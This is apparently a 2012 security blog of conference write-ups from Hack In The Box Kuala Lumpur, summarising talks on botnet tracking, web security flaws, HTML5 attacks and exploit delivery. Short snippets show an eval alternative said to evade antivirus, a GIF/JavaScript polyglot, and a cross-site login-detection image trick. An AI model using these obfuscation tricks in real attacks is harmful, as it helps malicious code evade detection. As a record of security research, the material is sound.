I contacted Google about this issue, they said they didn't regard this as a serious security risk as user data cannot be compromised and the risk of phishing is minimal. For example, there's nothing stopping someone from registering a domain called that would be far more effective for phishing. So should all vulnerabilities found in the Google cache be classified as low risk?

It's an interesting question, does the Google cache offer a unique attack vector? Maybe I'll save this for another blog post ;) If anyone has any ideas or comments feel free to leave a message below.


Saturday, 13 October 2012

Hack In The Box 2012 Kuala Lumpur Day Two

So Hack In The Box 2012 is all over. I had an awesome two days, the talks were really enjoyable and it was great talking to the other folks who attended. As promised here is the write-up of day two (with one or two pictures).

List of talks I attended:
  • Why Web Security is Fundamentally Broken by Jeremiah Grossman
  • Innovative Approaches to Exploit Delivery by Saumil Shah
  • XSS & CSRF Strike Back Powered by HTML5 by Shreeraj Shah
  • IOS panel discussion
  • Messing Up the Kids Playground: Eradicating Easy Targets by Fyodor Yarochkin
  • A Scientific (But Non Academic) Study of Malware Obfuscation Technologies by Rodrigo Rubira Branco
  • Element 1337 in the Periodic Table: Pwnium by Chris Evans 

Why Web Security is Fundamentally Broken by Jeremiah Grossman

This talk focused on the fundamental flaws present in the current security model of web technology. Nothing Jeremiah talked about required a vulnerability to exploit, all of these flaws are there by design. Jeremiah started by introducing the two main categories of browser attack:
  • Attacks to escape the browser e.g. browser exploits, java exploits, adobe exploits etc.
  • Attacks from inside the browser sandbox, e.g. XSS, CSRF, clickjacking etc.
He made the point that often there is little users can do to protect themselves and the responsibility to address these flaws lies with the website owners. Next he presented a couple of examples.

img src Login Checker
This one liner tries to retrieve an image from a site on a different domain. If the user is logged in Twitter or Facebook will redirect to the image sending back a HTTP 302 message. If not an error code will be returned. There is a module within Beef that uses this technique to check for gmail, facebook and twitter login status.

<img src="" onload="succesful()" onerror="error()">

Personal Information leakage through Follows and Likes
It's surprising how much information is given away when someone follows or likes something on Twitter or Facebook. With default privacy settings it's possible for the person you follow or the page you like to actually view a selection of your personal information. Facebook and Twitter should really address this issue but this would no doubt piss off big business as data mining these sources would be prevented.

Host Information Leakage
Through browser calls and javascript it's possible to find out information such as browser version, underlying OS, browser plugins, add-ons and extensions (different to plugins). It's possible to brute force their existence by using the extension URLs from the app store.

Possible Solutions
  • To fix login detection - Do not send web visitors cookie data to off-domain destinations.
  • Not possible to fix likes or follows as money-making analytics relies on these features.
  • Ban iframes or transparent iframes. Facebook, gmail and others rely on iframes!
  • Create a barrier between public and private networks filtering particular RFCs. Not possible because business's often have fucked up internet/intranet settings.
  • Ultimately no browser is willing to fix these issues as they might lose users.
  • Instead apply a bandage through opt-in security settings deployed by individual website owners. e.g. Secure cookies, HttpOnly, x-frame-options.

There are three choices either we :
  • Carry on as usual. 
  • Use the new .SECURE tld. 
  • Break the internet, uh oh.
As a final thought Jeremiah looked at the browser model used by mobile apps. Apps are quite often just mini versions of browsers but locked down to a particular site. This is a secure model and something that could be adopted on Desktops.

Innovative Approaches to Exploit Delivery by Saumil Shah

Saumil presented an interesting way to obfuscate javascript by encoding it within an image. He started off by covering traditional obfuscation techniques that usually rely on the eval statement to decode javascript. Although this can prevent manual analysis of code, it doesn't evade dynamic analysis and AV/IDS vendors will often flag an eval statement as suspicious! He gave a quick demo to show how easy it is to place malicious javascript in a tinyurl website and then embed it on another site or share the link through email/social networks.
Saumil then demo'ed an encoder and decoder he had built that would take javascript and convert it to a basic png and back. Neat stuff. However this still used an eval to process the image to extract and run the javascript.

He presented an easy alternative to eval:
  • Flagged by AV:  var a = eval(str);
  • Not-flagged by AV:  var a = (new Function(str))();
Next up he demonstrated how to create an image that is both an image and javascript. Wut?!?! I can't remember exactly how he did this but if you look at the hex of a gif you will see the gif89a header after this there were some width and height bits, apparently you can just stuff javascript after these bits using tags /**my javascript**/ and it will be executed. All you do is embed it in the page with the following:

<img src="a.gif">
<script src="a.gif"></script>

And this worked on all browsers. Next he presented a bmp example, where he had inserted the javascript in the alpha channel section of the image and the original image remained completely in tact.

Combining these techniques he demoed two images one containing the payload another the decoding routine. It was cool seeing this in action and I can imagine it's a nightmare for AV vendors to try and catch this kind of obfuscation.

In his final demo he placed adobe reader exploit code within an image in a pdf and used it to exploit adobe reader.

This talk reminded me a lot of Thor's talk at DefCon "Socialized Data: Using Social Media as a Cyber Mule" where he demoed embedding data in video and images. At the moment I don't think this is something malware authors have really focused on just because they haven't needed to but I'm sure going into the future we'll see more of this stuff in the wild.

XSS & CSRF Strike Back Powered by HTML5 by Shreeraj Shah

I actually saw this talk at BlackHat 2012 but I found Shreeraj went through his material really fast. Unfortunately it was the same time this time round as well :( He essentially took us on a whistlestop tour of HTML5, the modern browser architecture and exactly where the issues lie.

Shreeraj presented a few examples, I'm only going to mention my favourites:

CSRF with XHR and CORS bypass
Before HTML5 cross domain XHR was not possible, however now pages can set CORS headers to allow cross domain. For example when a site sets the access-control-origin header to "any" e.g. "access-control-allow-origin : *"  you can successfully make cross-domain calls. What this means is that if a user were to visit say legitimate site A that happened to contain malicious javascript an attacker would be able to do CSRF or pull data from the user's legitimate site B session.

He demonstrated how a malicious attacker could modify the code of a page to use cross domain resources. For example to replace a login element on the current page with remote data:


Instead of me writing a really poor explanation I'd recommend this link for some great examples of these techniques:

Web Storage
HTML5 brings some really interesting new features such as the ability for web sites to create SQL databases or filesystems in the browser. If the website that's implementing these features contains XSS an attacker can pull all of a users data from these resources. It's cool but unfortunately not possible cross domain.

In Chrome you can view the resources of the site by bringing up the developer console, right click the page and select inspect element. Under the resources tab you will be able to see any locally stored data including session data and cookies.

For more awesome HTML5 hacks it's worth checking out:

IOS Panel Discussion by @Musclenerd, David ‘@planetbeing’ Wang, Cyril ‘@pod2g’ Mark Dowd

I went to see the iOS6 talk on day one and found it a bit tricky to follow as I don't have a lot of experience with iOS or writing kernel exploits. Although this panel discussion focused on similar material it was more high level and not as technical as the previous talk.

Despite the aslr, heap hardening, address space protection and more added by Apple, there's no doubt these will be the guys releasing a jailbreak for the iPhone5 in the coming weeks.

Messing Up the Kids Playground: Eradicating Easy Targets by Fyodor Yarochkin

Fyodor presented a rushed and somewhat unclear talk on ways to detect/catch malware and botnet owners by analysing DNS records.

He started by giving an overview of the Crimeware as a service (CaaS) scene. He described how different groups are generally responsible for different parts of the service. Fundamentally this is a black market economy where there is competition between individuals and just like the real business world it's far more profitable to cooperate with others to get the job done. This has resulted in different groups that each specialise in either malware creation, traffic generation, infrastructure or handling stolen data and each group will sell their services to the highest bidder.

He provided an interesting example of a banner advertising agency in Russia that has managed to escape prosecution because they claimed they had been hacked and there just wasn't enough evidence to achieve a conviction.

Next Fyodor showed two ransomware examples one that been installed locally through a browser exploit and one fake firefox update javascript example running in the browser.

The remainder of the talk was a bit rushed, he talked a bit about how patterns in DNS can be used to detect botnets. Typically the same registrar will be reused and also the same whois information. It is also possible to automate detection of malicious domain names but he didn't go into how to do this.

He mentioned fast flux techniques where malicious domains are rotated very rapidly to evade detection and suggested how this could be done. Apparently a number of registrars offer a returns policy on domains and charge only a small cancellation fee. This allows botnet infrastructure owners to repeatedly change domains for only a small cost. He also talked about how you can try to predict the domains they will use in the future. If you guess correct then you will get bots actually connecting to you, sweet.

A Scientific (But Non Academic) Study of Malware Obfuscation Technologies by Rodrigo Rubira Branco

I only caught the last 20 minutes of this talk and regretted not watching from the start. Rodrigo is head of malware research at Qualys and can best be described as a funny Brazilian guy. In his talk he presented an analysis of anti-debugging and obfuscation techniques used by malware.

I missed the first half of the talk where he described the various anti-debugging techniques used but I was lucky enough to catch the second half where Rodrigo explained how the presence of anti-debugging in malware can actually be used as a way to detect the malware. It's such a simple idea and I'm really surprised (as was Rodrigo) that AV vendors don't use these techniques already.

For more info -

Element 1337 in the Periodic Table: Pwnium by Chris Evans 

The final talk of the day was presented by Chris Evans who is a senior in the Google security team. He started off by handing out a big pile of cash to different researchers for their contributions. Props to Google for supporting the security community.

Chris mentioned how successful the vulnerability disclosure program had been since it's launch and presented some statistics. I was surprised to see that Chrome has contained so many vulnerabilities. I had rather naively assumed Google developers were invincible! Take a look at:  each month a ton of vulnerabilities get reported.

Next he discussed Pinkie Pie's working Chrome exploit. Pinkie's exploit abused a use-after-free vulnerability present in the SVG module to compromise the renderer process within Chrome and a ROP chain to evade ASLR. To escape the Chrome sandbox and access Windows he used specific IPC messages that weren't properly restricted. In other words to escape the sandbox no super fancy exploit was used, just a simple call to the Chrome IPC layer. Chris was face palming live on stage at this point. More info can be found here:

Lock-picking stand:

CTF contest:

It was an awesome two days and hopefully I'll be back next year. If anyone has any comments or questions feel free to post them below.

Pwndizzle over and out.

Thursday, 11 October 2012

Hack In The Box 2012 Kuala Lumpur Day One

Hey guys,

This is a quick write-up of my experiences at Hack In The Box 2012 in Kuala Lumpur (day one). For each talk I attended I've tried to include a summary of the main points. Sadly I forgot to take pictures so it's one massive wall of text, sorry! Will try and take some for day 2.

List of talks I attended:

  • Tracking Large Scale Botnets by Jose Nazario
  • Data Mining A Mountain of Vulnerabilities by Chris Wysopal
  • 6000 Ways And More - A 15 Year Perspective on Why Telcos Keep Getting Hacked by Philippe Langlois & Emmanuel Gadaix
  • A Short History of The JavaScript Security Arsenal by Petko Petkov
  • iOS6 Security by Mark Dowd & Tarjei Mandt
  • "I Honorably Assure You: It is Secure”: Hacking in the Far East by Paul Sebastian Ziegler

Tracking Large Scale Botnets by Jose Nazario

Jose's talk focused on the techniques that are used today to measure the size of botnets by tracking down infected machines.

The general aim of his work was to measure the number of bots, in terms of number of infected machines/ip's/people/accounts and ways to classify the bots by type, geographical region and what the bot does (financial, DOS, infrastructure impact). An interesting quote from a colleague was "it can be easy to identify and count the number of infected machines but its impossible to know the total number of machines (clean and infected) on the internet today". This makes it difficult to really gauge the scale of the problem. He also noted that the resources of security teams are limited and should be carefully prioritized.

Next Jose talked about the actual methods used to track botnets:
  • Sinkholes - Redirect CnC traffic to your server using DNS injection, P2P injection, route redirection. Count unique ip's connecting per day. Once redirected, you can send updates and commands to the bots (e.g. removal command) however usually this isn't done for legal reasons. Sometimes its not possible to directly interact with the bots as they sign updates or have other protections (e.g. encryption). There are two major advantages to using sinkholes. Once you have redirected CnC traffic you (i) effectively lock out the botnet herder (ii) can find out who is infected.
  • Traffic logs - If you can monitor traffic logs botnet traffic requests often contain a unique identifier. For example in conficker there was a "q" value that acted as an identifier.
  • Darknet monitoring - Monitor traffic destined for unused IPv4 address space blocks. It is possible to detect scanning from infected machines targeting the unused IPv4 regions.
  • URL Shorteners - Short urls are commonly used to spread malware (e.g. tinyurl, It is possible to analyse the characteristics of users who have clicked known bad links. For example using url shortener you can view usage statistics of who clicked the link e.g. OS, Browser etc.
  • Direct Network Access - Possible to directly monitor network traffic .e.g. ISP.
  • Direct Host Access - Microsoft is in best position as it can directly interact with Windows hosts, can count incidents from Windows Defender. Data currently not publicly available.
  • Direct P2P enumeration - Crawl the botnet, asks peers who they know. Gather full list. Need to reverse protocol, can be difficult to break crypto. 
Jose noted that you can't always see all of the bots due to poor network visibility, traffic redirection by ISPs, DNS blacklists or offline hosts. It is possible to sometimes over/under count the number of infected machines because of DHCP (as devices change IP the same device might appear multiple times), NAT (Can really mess up estimates, e.g. Blaster worm in 2003 - Arbor estimated 800,000 where as Microsoft 8,000,000), Opt-out (if a user disables updates or reporting).

Data Mining A Mountain of Vulnerabilities by Chris Wysopal

Chris works for Veracode where he focuses on secure code review. He presented findings from a comprehensive study of the vulnerabilities found in 9910 commercial and government applications (using static and dynamic analysis). He had correlated the vulnerabilities with the metadata of the applications (e.g. type of application, size, origin, language used) to find meaningful statistics.
  • Most applications were internally developed 75%, 15% were commercial applications, 10% open source - 50% were built with java, 25% with .net.   
Comparing OWASP statistics with the 9910 applications analysed:
  • SQL injection was used in 20% of all attacks when 32% apps were vulnerable.
  • XSS was used in only 10% of attacks when 68% apps were vulnerable.
  • Information leakage was used in only 3% of attacks but 66% of apps were vulnerable. 
XSS appears massively under targeted. Next, comparing languages:
  • In Java, Coldfusion, .NET and PHP applications, XSS is the most common vulnerability. 
  • However when Adobe added a language level fix for XSS this helped fix the issue somewhat. 
  • C++ applications had completely different vulnerabilties e.g. buffer overflows, error handling. 
  • PHP had a lot of SQL injection and directory traversal issues, way more than Java and .net.
Language choice matters a lot! Comparing how vulnerabilities have changed over time.
  • The number of XSS vulnerabilities has remained steady over the last 2 years. Indicating it's not being exploited as much as other vulnerabilities and hence not being fixed.
  • The number of SQL injection vulnerabilities has decreased over the last 2 years. Most likely due to the publicity SQL injection has received.
  • Overall 86% of applications contain at least one vulnerability from the OWASP Top 10.

Industries and business:
  • Which industries are getting their code externally tested? 
  • Finance, Software makers, Tech. 
  • Utilities is one of the worse performing. (but what about all that critical infrastructure?!?! uh oh.)
  • Which industry is most secure? 
  • Finance is most secure. 
  • Surprisingly security products themselves were most insecure!
  • Does size of company matter?
  • No difference in number of vulnerabilities between public and private companies.
  • No difference in number of vulnerabilities by company revenue.
  • The bottom-line - Company size and revenue don't effect the quality of code!

Regarding vulnerabilities in mobile apps, the major differences here were related to the language chosen. As Android is Java based there is more XSS/SQLi where as iOS apps are written in objective C so have buffer management errors, directory traversal, not found in Java. However iOS apps are signed so are safer overall!

Chris finally talked about the software developers and how they are ultimately responsible for the quality of code. He presented a statistic that on average half of all developers don't understand security. When put like this it seems fairly obvious why there are so many security flaws in modern applications. More security awareness seems to be the answer.

6000 Ways And More - A 15 Year Perspective on Why Telcos Keep Getting Hacked by Philippe Langlois & Emmanuel Gadaix

This was an interesting talk, unfortunately I don't have a lot of experience with telco backbone infrastructure or protocols so found a lot of the presentation tricky to understand. One thing was clear though - telco's have a ton of serious security flaws.

The main issues are:
  • Currently operators are focused on availability, fraud, it security, interception, spam.
  • There are few experts in the field of telco security.
  • The walled garden approach and a rigid industry dominated by big players.
  • Scary how easy attacks are and they are happening behind closed doors.
Like a lot of other industries they try to rely on security through obscurity and have a reactive as opposed to proactive approach to security. Hopefully things will change with the the buzz around cyberwar and the importance of national infrastructure.

A Short History of The JavaScript Security Arsenal by Petko Petkov

This was by far my favourite talk of the day. Petko started by giving a quick history of browser technology and common attack methodologies today. At the moment there are two main choices, Beef can be used for XSS/javascript attacks or Metasploit can be used to target vulnerabilities within the browser itself. Both have limitations and with browsers becoming a lot more secure new techniques are needed.

Three evils plans (attack vectors) were presented:
  • Use the victim to attack other web targets.
  • Use the victim to attack internal resources.
  • Use the victim to attack others through social networks.
  • Bonus plan - Use the victim's browser to compromise the underlying system.

He described how his tools have evolved and referenced the below specifically:

JSPortScanner -> AttackAPI -> WebSecurify Suite -> Weaponry

One of the major limitations is that it's difficult to port classic security tools from C, ruby etc. to javascript to be able to use them in browser. Weaponry is intended as a way to address this issue. By creating a custom cross compiler it would be possible to convert your favourite programs to javascript and use them actually in the browser. (At least this is what I thought he was saying)

Petko demo'ed a browser extension for chrome and firefox that had a range of attack functionality built in. This would allow a remote attack to use the persons browser as a pivot. I was particularly impressed by how light the extension seemed to be and how quickly it performed scans and analysed data. It really was a step up from Beef. Oh and the UI was really sexy.

The one area I asked Petko about was initial compromise which is something he didn't really explain. For a malicious attacker to use these techniques the target would need to install the malicious browser extension. While not as likely to succeed as say Beef, you only need to look at the prevailance of malicious apps to understand that people would be more than stupid enough to install this kind of application if packaged correctly.

Overall I was really impressed. I spoke to Petko at the end and he said that the project will be open source but is currently still under construction.

iOS6 Security by Mark Dowd & Tarjei Mandt

I was originally going to see a talk by the founders of the pirate bay but they apparently got detained in Bangkok and so couldn't make it to the conference. Instead I headed over to the iOS6 talk hoping to learn something new.

This was quite a technical talk digging into the new anti-jail-breaking protections (stack cookies, ASLR, Heap protections) put in place by Apple in iOS6. Having only limited experience with exploit design and next to no experience with the internals of iOS I did struggle to follow the talk. I gotta say though how impressed I was at the way these guys picked apart iOS with such ease. With everything these guys understood it was hardly surprising seeing them produce such a complex jailbreak (again!). All I kept thinking was "Why hasn't Apple hired these guys?".

"I Honorably Assure You: It is Secure”: Hacking in the Far East by Paul Sebastian Ziegler

In the final presentation of the day Paul talked about his experiences with IT security (and life in general) in Japan and South Korea. Having lived in Japan myself I was interested to find out how different or similar his experiences were to mine.

He started by talking about the god-like status given to white foreigners in Japan and how this can be used to do social engineering. He suggested foreigners could be broken down into three categories military, English teachers and business men and out of those categories the business man commands the most respect and so is perfect for social engineering. And all that is needed is a suit, magically once the suit is on you become immune to everything.

And in emergencies (when the suit doesn't work) just play the dumb foreigner card. Having done this myself I can confirm this is a very useful strategy!

He went on to talk about the prevalance of open wireless networks and use of WEP in Japan and how open networks are everywhere is South Korea. Then talked about SEED which is a government alternative to SSL that is deployed everywhere in South Korea. This has a knock on effect where users are forced to use legacy browsers as SEED doesn't support modern browsers. With users migrating from Windows XP to Windows 7 they have been forced to install IE6 on Windows 7 in order to use SEED websites. IE6 use was always high in South Korea because of seed but recently its actually been increasing! crazy eh.

Day two will be up tomorrow.